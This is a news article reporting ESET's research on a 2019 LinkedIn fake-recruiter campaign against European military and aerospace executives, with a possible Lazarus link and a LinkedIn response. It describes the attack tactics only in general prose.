Attackers leveraged LinkedIn and posed as recruiters in order to steal information and money from European military and aerospace executives.
According to new research from ESET, the technique involved threat actors contacting the executives via LinkedIn posing as recruiters. Named Operation In(ter)ception, the actions took place from September to December 2019 and began with what ESET called “a quite believable job offer, seemingly from a well-known company in a relevant sector” and contained a OneDrive link which contained a PDF document with salary information related to the fake job offer.
However, ESET malware researcher Dominik Breitenbacher said malware was silently deployed on the victim’s computer giving the attacker “an initial foothold and reached a solid persistence on the system.”
Among the tools the attackers utilized was custom multistage malware that often came disguised as legitimate software, and modified versions of open-source tools.
Speaking on ESET’s Virtual World conference this week, head of threat research, Jean-Ian Boutin, said the job offer was often “too good to be true” and while the conversation would start out as friendly, the attacker would pressure the executive to answer questions more and more rapidly. The attacker would also ask what system the executive was using in order to determine configurations.
Boutin said the PDF file was a decoy, which featured positions with expected salaries. However, the executable creates a scheduled task on the victim’s computer, a built-in functionality in Windows, which is automatically launched. “This can be very useful in an enterprise set up, but is also a common technique used by threat groups to ensure their malicious payload is run periodically once it is installed,” he said.
He explained that the malicious payload in the scheduled task is used by the attacker to connect to an external server “and is able to download and execute arbitrary content.”
Post-attack, Boutin said all of the exfiltrated data was placed in password-protected RAR archives, and uploaded to Dropbox using a command line tool. “What made this threat actor difficult to track was that their operators were really careful and cleaned up their traces when moving from one system to another,” he said. The attackers also removed the LinkedIn profiles once the compromise was successful.
During the research, ESET also determined some similarities with actions by the Lazarus group, who had been attributed as being involved with the Sony Pictures attack and the WannaCry outbreak. Whilst ESET said there was not enough information to definitely attribute these attacks to the Lazarus Group, there were some similarities in the code and tactics used.
In a comment sent to Infosecurity, Paul Rockwell, head of trust and safety at LinkedIn, said: “We actively seek out signs of state-sponsored activity on the platform and quickly take action against bad actors in order to protect our members. We don’t wait on requests, our threat intelligence team removes fake accounts using information we uncover and intelligence from a variety of sources, including government agencies.
“Our teams utilize a variety of automated technologies, combined with a trained team of reviewers and member reporting, to keep our members safe from all types of bad actors. We enforce our policies, which are very clear: the creation of a fake account or fraudulent activity with an intent to mislead or lie to our members is a violation of our terms of service.
“In this case, we uncovered instances of abuse that involved the creation of fake accounts. We took immediate action at that time and permanently restricted the accounts.” -